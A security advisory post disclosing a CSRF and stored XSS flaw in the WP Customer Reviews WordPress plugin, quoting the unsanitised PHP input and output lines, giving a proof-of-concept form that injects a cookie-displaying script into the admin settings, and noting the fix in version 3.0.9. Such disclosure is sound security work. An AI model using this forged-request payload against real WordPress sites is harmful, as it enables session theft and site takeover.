06 Apr

Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in WP Customer Reviews

We recently discovered that the WP Customer Reviews plugin had a cross-site request forgery (CSRF)/cross-site scripting (XSS) vulnerability in version 3.0.8, and some prior versions, on the page /wp-admin/admin.php?page=wpcr3_options&tab=form_settings.

No nonce is included on the page leading to the CSRF issue.

For the XSS issue, in the file /include/admin/wp-customer-reviews-3-admin.php starting on line 180 the input is brought in and there is no sanitization done:

foreach ($_POST as $c => $val) {
 if (is_array($val)) {
 $this->p->$c = $val;
 } else {
 $this->p->$c = trim(stripslashes($val));

When the values are outputted on the page through the same file they are not escaped. At least one place that it occurs is on line 71:

echo '<input class="'.$options->class.'" name="'.$name.'['.$valObj->value.'][label]" value="'.$value[$valObj->value]['label'].'" />';

Proof of Concept

The following proof of concept will cause an alert box with any accessible cookies to be shown on the page. This will occur right after you hit the Submit button when using the Firefox web browser. Other major web browser have XSS filtering, so it will only be shown if you return to/wp-admin/admin.php?page=wpcr3_options&tab=form_settings again after having submitted it.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-admin/admin.php?page=wpcr3_options&tab=form_settings" method="post">
<input type="hidden" name="wpcr3_option_standard_fields[fname][label]" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="wpcr3_save_settings" value="form_settings" />
<input type="submit" value="Submit" />


  • 4/4/2016 – Developer notified.
  • 4/5/2016 – Version 3.0.9 released, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if the knew about them as well as making sure that that needed security checks have been implemented in the plugin. If you order two reviews you will receive free lifetime subscription to our service.

Leave a Reply

Your email address will not be published. Required fields are marked *